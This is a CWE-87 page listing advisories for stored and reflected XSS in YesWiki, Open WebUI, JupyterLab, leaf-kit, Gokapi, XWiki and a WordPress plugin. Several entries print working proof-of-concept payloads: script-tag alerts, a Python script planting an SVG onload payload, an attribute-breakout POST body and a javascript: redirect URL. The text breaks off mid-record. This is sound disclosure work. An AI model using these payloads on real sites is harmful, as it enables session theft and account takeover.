Common Weakness Enumeration

CWE-87

Allowed

Improper Neutralization of Alternate XSS Syntax

Abstraction: Variant · Status: Draft

The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.

98 vulnerabilities reference this CWE, most recent first.

GHSA-37FQ-47QJ-6J5J

Vulnerability from github – Published: 2026-04-01 00:13 – Updated: 2026-04-10 19:34
VLAI
Summary
YesWiki has Persistent Blind XSS at "/?BazaR&vue=consulter"
Details

Summary

A stored and blind XSS vulnerability exists in the form title field. A malicious attacker can inject JavaScript without any authentication via a form title that is saved in the backend database. When any user visits that injected page, the JavaScript payload gets executed.

Type: Stored and Blind Cross-Site Scripting (XSS) Affected Component: form title input field Authentication Required: No (Unauthenticated attack possible) Impact: Arbitrary JavaScript execution in victim’s browser

Details

A Stored XSS vulnerability occurs when an application stores malicious user input (in this case, a script injected via the form title field) in its backend database and renders it later on a page viewed by other users without proper sanitization or encoding.

In this case, the attacker can inject JavaScript payloads in the title field of a form, which the application stores in the database. When any user, such as an admin or another visitor, views the page that displays this title, the malicious script executes in their browser context.

PoC

  • Visit https://yeswiki.net/?BazaR&vue=formulaire or localhost/?BazaR&vue=formulaire or https://ferme.yeswiki.net/[username]/?BazaR&vue=formulaire
  • Click on the + icon to add a record via the Diary form.
  • Inject the payload like: <script>alert(document.cookie)</script> or <script>alert(1)</script> into Name of the event and Description
  • Then save the record by clicking To validate
  • The payload will be executed when anyone visits /?BazaR&vue=consulter also in the diary record /?wiki=BazaR&vue=consulter&action=recherche&q=&id=2&facette=

The payload is persistant.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "yeswiki/yeswiki"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T00:13:57Z",
    "nvd_published_at": "2026-04-02T18:16:31Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA stored and blind XSS vulnerability exists in the form title field. A malicious attacker can inject JavaScript without any authentication via a form title that is saved in the backend database. When any user visits that injected page, the JavaScript payload gets executed.\n\nType: Stored and Blind Cross-Site Scripting (XSS)\nAffected Component: form title input field\nAuthentication Required: No (Unauthenticated attack possible)\nImpact: Arbitrary JavaScript execution in victim\u2019s browser\n\n\n### Details\nA Stored XSS vulnerability occurs when an application stores malicious user input (in this case, a script injected via the form title field) in its backend database and renders it later on a page viewed by other users without proper sanitization or encoding.\n\nIn this case, the attacker can inject JavaScript payloads in the title field of a form, which the application stores in the database. When any user, such as an admin or another visitor, views the page that displays this title, the malicious script executes in their browser context.\n\n### PoC\n- Visit `https://yeswiki.net/?BazaR\u0026vue=formulaire` or `localhost/?BazaR\u0026vue=formulaire` or \n `https://ferme.yeswiki.net/[username]/?BazaR\u0026vue=formulaire`\n- Click on the `+` icon to add a record via the `Diary` form.\n- Inject the payload like: `\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` or `\u003cscript\u003ealert(1)\u003c/script\u003e` into `Name of the event` and `Description`\n- Then save the record by clicking `To validate`\n- The payload will be executed when anyone visits `/?BazaR\u0026vue=consulter` also in the diary record \n`/?wiki=BazaR\u0026vue=consulter\u0026action=recherche\u0026q=\u0026id=2\u0026facette=`\n\nThe payload is persistant.",
  "id": "GHSA-37fq-47qj-6j5j",
  "modified": "2026-04-10T19:34:59Z",
  "published": "2026-04-01T00:13:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-37fq-47qj-6j5j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34598"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YesWiki/yeswiki"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/releases/tag/v4.6.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "YesWiki has Persistent Blind XSS at \"/?BazaR\u0026vue=consulter\""
}

GHSA-3856-3VXQ-M6FC

Vulnerability from github – Published: 2026-05-14 20:18 – Updated: 2026-05-19 15:58
VLAI
Summary
Open WebUI has XSS via SVG in /api/v1/channels/webhooks/{webhook_id}/profile/image
Details

As part of our research on improving our AI pentest, we have uncovered the following issue in Open WebUI. We've manually verified and tided up the report, but you can also find the original agent finding at the bottom of this report.

Summary

The channel webhook create/update flow accepts arbitrary profile_image_url values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves this SVG as image/svg+xml without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser.

Details

The server accepts data:image/svg+xml;base64,... values for profile_image_url when creating or updating a webhook. Later, GET /api/v1/channels/webhooks/{webhook_id}/profile/image detects data:image, base64-decodes it, derives the media type from the header (e.g., image/svg+xml), and returns a StreamingResponse with Content-Disposition: inline and media_type set to image/svg+xml. There is no sanitization or transformation. When this URL is opened in a browser, SVG event handlers such as onload execute in the application origin, resulting in stored XSS.

PoC

  1. Set up a new instance of Open WebUI and log in as admin
  2. In the Admin Panel, enable Channels (Beta) and click Save
  3. Create a low-privilege user in the Users tab
  4. As the attacker, use the low-privilege user to run the following script:
import base64
import secrets

import requests

BASE_URL = "http://127.0.0.1:14000"
EMAIL = "low@local.test"
PASSWORD = "low"

CHANNEL_NAME_PREFIX = "xsswh-poc"
WEBHOOK_NAME = "xss-webhook-poc"
SVG_CANARY = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(origin)"></svg>'

if __name__ == "__main__":
    s = requests.Session()
    s.headers.update({"Content-Type": "application/json"})

    r = s.post(
        f"{BASE_URL}/api/v1/auths/signin",
        json={"email": EMAIL, "password": PASSWORD},
        timeout=30,
    )
    r.raise_for_status()
    s.headers["Authorization"] = f"Bearer {r.json()['token']}"

    r = s.post(
        f"{BASE_URL}/api/v1/channels/create",
        json={
            "name": f"{CHANNEL_NAME_PREFIX}-{secrets.token_hex(4)}",
            "type": "group",
            "user_ids": [],
            "group_ids": [],
        },
        timeout=30,
    )
    r.raise_for_status()
    channel_id = r.json()["id"]

    payload = "data:image/svg+xml;base64," + base64.b64encode(SVG_CANARY.encode()).decode()
    r = s.post(
        f"{BASE_URL}/api/v1/channels/{channel_id}/webhooks/create",
        json={"name": WEBHOOK_NAME, "profile_image_url": payload},
        timeout=30,
    )
    r.raise_for_status()
    webhook_id = r.json()["id"]

    print(f"{BASE_URL}/api/v1/channels/webhooks/{webhook_id}/profile/image")

This should print a URL like the following, which when visited (by any user), triggers a JavaScript popup proving XSS:

http://127.0.0.1:14000/api/v1/channels/webhooks/aa7c925f-4584-4274-82bf-33a7e98a3365/profile/image

image

Impact

Conditions required: The victim must be an authenticated, verified user. Channel feature must be enabled.

Stored XSS enables arbitrary JavaScript execution in the context of the application's origin for any viewer who loads the malicious profile image URL. An attacker can exfiltrate session tokens (localstorage) or API keys stored in the page context, perform unauthorized actions on behalf of the victim via same-origin APIs, alter settings, or pivot to broader account compromise. Because this vector is persisted in the database as part of a webhook's profile image, it remains active until removed.

Original Agent Report

app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20439766 (5)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45314"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:18:09Z",
    "nvd_published_at": "2026-05-15T22:16:54Z",
    "severity": "HIGH"
  },
  "details": "As part of our research on improving our [AI pentest](https://www.aikido.dev/attack/aipentest), we have uncovered the following issue in Open WebUI. We\u0027ve manually verified and tided up the report, but you can also find the original agent finding at the bottom of this report.\n\n### Summary\n\nThe channel webhook create/update flow accepts arbitrary `profile_image_url` values, including `data:image/svg+xml;base64,...` payloads. The profile image endpoint then decodes and serves this SVG as `image/svg+xml` without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser.\n\n### Details\n\nThe server accepts `data:image/svg+xml;base64,...` values for `profile_image_url` when creating or updating a webhook. Later, `GET /api/v1/channels/webhooks/{webhook_id}/profile/image` detects `data:image`, base64-decodes it, derives the media type from the header (e.g., `image/svg+xml`), and returns a `StreamingResponse` with `Content-Disposition: inline` and `media_type` set to `image/svg+xml`. There is no sanitization or transformation. When this URL is opened in a browser, SVG event handlers such as onload execute in the application origin, resulting in stored XSS.\n\n### PoC\n\n1. Set up a new instance of Open WebUI and log in as admin\n2. In the Admin Panel, enable *Channels (Beta)* and click Save\n3. Create a low-privilege user in the Users tab\n4. As the attacker, use the low-privilege user to run the following script:\n\n```py\nimport base64\nimport secrets\n\nimport requests\n\nBASE_URL = \"http://127.0.0.1:14000\"\nEMAIL = \"low@local.test\"\nPASSWORD = \"low\"\n\nCHANNEL_NAME_PREFIX = \"xsswh-poc\"\nWEBHOOK_NAME = \"xss-webhook-poc\"\nSVG_CANARY = \u0027\u003csvg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(origin)\"\u003e\u003c/svg\u003e\u0027\n\nif __name__ == \"__main__\":\n    s = requests.Session()\n    s.headers.update({\"Content-Type\": \"application/json\"})\n\n    r = s.post(\n        f\"{BASE_URL}/api/v1/auths/signin\",\n        json={\"email\": EMAIL, \"password\": PASSWORD},\n        timeout=30,\n    )\n    r.raise_for_status()\n    s.headers[\"Authorization\"] = f\"Bearer {r.json()[\u0027token\u0027]}\"\n\n    r = s.post(\n        f\"{BASE_URL}/api/v1/channels/create\",\n        json={\n            \"name\": f\"{CHANNEL_NAME_PREFIX}-{secrets.token_hex(4)}\",\n            \"type\": \"group\",\n            \"user_ids\": [],\n            \"group_ids\": [],\n        },\n        timeout=30,\n    )\n    r.raise_for_status()\n    channel_id = r.json()[\"id\"]\n\n    payload = \"data:image/svg+xml;base64,\" + base64.b64encode(SVG_CANARY.encode()).decode()\n    r = s.post(\n        f\"{BASE_URL}/api/v1/channels/{channel_id}/webhooks/create\",\n        json={\"name\": WEBHOOK_NAME, \"profile_image_url\": payload},\n        timeout=30,\n    )\n    r.raise_for_status()\n    webhook_id = r.json()[\"id\"]\n\n    print(f\"{BASE_URL}/api/v1/channels/webhooks/{webhook_id}/profile/image\")\n```\n\nThis should print a URL like the following, which when visited (by any user), triggers a JavaScript popup proving XSS:\n\nhttp://127.0.0.1:14000/api/v1/channels/webhooks/aa7c925f-4584-4274-82bf-33a7e98a3365/profile/image\n\n\u003cimg width=\"1079\" height=\"222\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ce158ace-d14f-4a73-aeb0-e828aff005df\" /\u003e\n\n### Impact\n\nConditions required: The victim must be an authenticated, verified user. Channel feature must be enabled.\n\nStored XSS enables arbitrary JavaScript execution in the context of the application\u0027s origin for any viewer who loads the malicious profile image URL. An attacker can exfiltrate session tokens (localstorage) or API keys stored in the page context, perform unauthorized actions on behalf of the victim via same-origin APIs, alter settings, or pivot to broader account compromise. Because this vector is persisted in the database as part of a webhook\u0027s profile image, it remains active until removed.\n\n### Original Agent Report\n\n\u003cimg width=\"400\" alt=\"app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20439766 (5)\" src=\"https://github.com/user-attachments/assets/0bfb2c7c-f7c4-49cd-a262-5ed9e1bb10df\" /\u003e",
  "id": "GHSA-3856-3vxq-m6fc",
  "modified": "2026-05-19T15:58:23Z",
  "published": "2026-05-14T20:18:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45314"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Open WebUI has XSS via SVG in /api/v1/channels/webhooks/{webhook_id}/profile/image"
}

GHSA-48RM-H6WJ-8PPR

Vulnerability from github – Published: 2024-05-02 18:30 – Updated: 2024-05-02 18:30
VLAI
Details

The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of the Button widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-02T17:15:18Z",
    "severity": "MODERATE"
  },
  "details": "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of the Button widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
  "id": "GHSA-48rm-h6wj-8ppr",
  "modified": "2024-05-02T18:30:53Z",
  "published": "2024-05-02T18:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2750"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3072751/exclusive-addons-for-elementor/trunk/elements/button/button.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3011b783-e4b4-45d2-81af-2f8d166a30ac?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4952-P58Q-6CRX

Vulnerability from github – Published: 2021-08-23 19:40 – Updated: 2024-11-18 16:26
VLAI
Summary
JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form>
Details

Impact

Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.

Patches

Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.

References

OWASP Page on Restricting Form Submissions

For more information

If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.

Credit: Guillaume Jeanne from Google

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyterlab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyterlab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0a0"
            },
            {
              "fixed": "2.2.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyterlab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0a0"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyterlab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0a0"
            },
            {
              "fixed": "3.0.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyterlab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.0a0"
            },
            {
              "fixed": "3.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "notebook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.7.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "notebook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-32797"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-75",
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-23T16:41:37Z",
    "nvd_published_at": "2021-08-09T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nUntrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.\n\n### Patches\n\nPatched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.\n\n### References\n\n[OWASP Page on Restricting Form Submissions](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)\n\n### For more information\n\nIf you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.\n\nCredit: Guillaume Jeanne from Google\n",
  "id": "GHSA-4952-p58q-6crx",
  "modified": "2024-11-18T16:26:15Z",
  "published": "2021-08-23T19:40:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/google/security-research/security/advisories/GHSA-c469-p3jp-2vhx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4952-p58q-6crx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32797"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jupyterlab/jupyterlab/commit/504825938c0abfa2fb8ff8d529308830a5ae42ed"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/jupyterlab/PYSEC-2021-130.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "JupyterLab: XSS due to lack of sanitization of the action attribute of an html \u003cform\u003e"
}

GHSA-4HFH-FCH3-5Q7P

Vulnerability from github – Published: 2026-02-19 19:40 – Updated: 2026-04-22 16:24
VLAI
Summary
Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster
Details

Summary

htmlEscaped in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.

Details

Relevant code: https://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14

Strings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters.

For example if you have the sequence "́ (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.

Thus "\"́".replacingOccurrences(of: "\"", with: "&quot;") does not replace the quote mark. This allows you to break out of html attributes.

I believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.

I see depending on version, leafkit might use replacing instead of replacingOccurences. I don't know swift that well and couldn't find docs on what replacing does, so I don't know if both versions of the function are affected. The version of swift i was testing on I believe was using replacingOccurences

It seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of <. Thus i think this is mostly limited to attributes and not general text.

PoC

An example vapor application that is vulnerable might look like

routes.swift

import Vapor

struct Hello: Content {
    var msg: String?
}

func routes(_ app: Application) throws {
    app.post { req throws in
    let Hello = try req.content.decode(Hello.self)
        return req.view.render("hello", [
            "msg": Hello.msg ?? "Hello World!"
        ])
    }
}

With a hello.leaf that looks like

<div title="#(msg)">Hover to see message</div>

And then you POST something like msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20

Impact

If a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "SwiftURL",
        "name": "github.com/vapor/leaf-kit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27120"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-75",
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-19T19:40:08Z",
    "nvd_published_at": "2026-02-20T22:16:29Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\n`htmlEscaped` in leaf-kit will only escape html  special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.\n\n### Details\n\nRelevant code:\nhttps://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14\n\nStrings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters. \n\nFor example if you have the sequence \"\u0301  (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.\n\nThus `\"\\\"\u0301\".replacingOccurrences(of: \"\\\"\", with: \"\u0026quot;\")` does not replace the quote mark. This allows you to break out of html attributes.\n\nI believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.\n\nI see depending on version, leafkit might use `replacing` instead of `replacingOccurences`. I don\u0027t know swift that well and couldn\u0027t find docs on what replacing does, so I don\u0027t know if both versions of the function are affected. The version of swift i was testing on I believe was using replacingOccurences\n\nIt seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of \u003c. Thus i think this is mostly limited to attributes and not general text.\n\n### PoC\n\nAn example vapor application that is vulnerable might look like\n\nroutes.swift\n```swift\nimport Vapor\n\nstruct Hello: Content {\n    var msg: String?\n}\n\nfunc routes(_ app: Application) throws {\n    app.post { req throws in\n\tlet Hello = try req.content.decode(Hello.self)\n        return req.view.render(\"hello\", [\n            \"msg\": Hello.msg ?? \"Hello World!\"\n        ])\n    }\n}\n```\n\nWith a hello.leaf that looks like\n```\n\u003cdiv title=\"#(msg)\"\u003eHover to see message\u003c/div\u003e\n```\n\nAnd then you POST something like `msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20`\n\n### Impact\nIf a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.",
  "id": "GHSA-4hfh-fch3-5q7p",
  "modified": "2026-04-22T16:24:14Z",
  "published": "2026-02-19T19:40:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vapor/leaf-kit"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster"
}

GHSA-4XG4-54HM-9J77

Vulnerability from github – Published: 2025-06-03 06:27 – Updated: 2025-08-26 20:10
VLAI
Summary
Gokapi has stored XSS vulnerability in friendly name for API keys
Details

Impact

By renaming the friendly name of an API key, an authenticated user could inject JS into the API key overview, which would also be executed when another user clicks on his API tab. With the affected versions <v2.0, there was no user permission system implemented, therefore all authenticated users were already able to see and modify all resources, even if end-to-end encrypted, as the encryption key had to be the same for all users with <v2.0. Nethertheless with XSS, other attack vectors like redirection or crypto mining would be possble.

Patches

This CVE has been fixed in v2.0.0

Workarounds

If you are the only authenticated user using Gokapi, you are not affected. A workaround would be to not open the API page if you suspect that another user might have injected code.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/forceu/gokapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.1"
            },
            {
              "last_affected": "1.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/forceu/gokapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20250530185940-65ddbc68fbfd"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48495"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-03T06:27:28Z",
    "nvd_published_at": "2025-06-02T12:15:25Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nBy renaming the friendly name of an API key, an authenticated user could inject JS into the API key overview, which would also be executed when another user clicks on his API tab.\nWith the affected versions \u003cv2.0, there was no user permission system implemented, therefore all authenticated users were already able to see and modify all resources, even if end-to-end encrypted, as the encryption key had to be the same for all users with \u003cv2.0. Nethertheless with XSS, other attack vectors like redirection or crypto mining would be possble.\n\n### Patches\n\nThis CVE has been fixed in v2.0.0\n\n### Workarounds\n\nIf you are the only authenticated user using Gokapi, you are not affected. A workaround would be to not open the API page if you suspect that another user might have injected code.",
  "id": "GHSA-4xg4-54hm-9j77",
  "modified": "2025-08-26T20:10:48Z",
  "published": "2025-06-03T06:27:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-4xg4-54hm-9j77"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48495"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Forceu/Gokapi/commit/65ddbc68fbfdf1c80cadb477f4bcbb7f2c4fdbf8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Forceu/Gokapi"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3736"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gokapi has stored XSS vulnerability in friendly name for API keys"
}

GHSA-4XM7-5Q79-3FCH

Vulnerability from github – Published: 2023-06-22 20:00 – Updated: 2023-06-22 20:00
VLAI
Summary
XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in DeleteApplication page
Details

Impact

Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as:

xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)

This vulnerability exists since XWiki 6.2-milestone-1.

Patches

The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.

Workarounds

It's possible to workaround the vulnerability by editing the page AppWithinMinutes.DeleteApplication to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.

References

  • Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20614
  • Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583
  • Commit containing the actual fix in the page: https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-appwithinminutes-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.2-milestone-1"
            },
            {
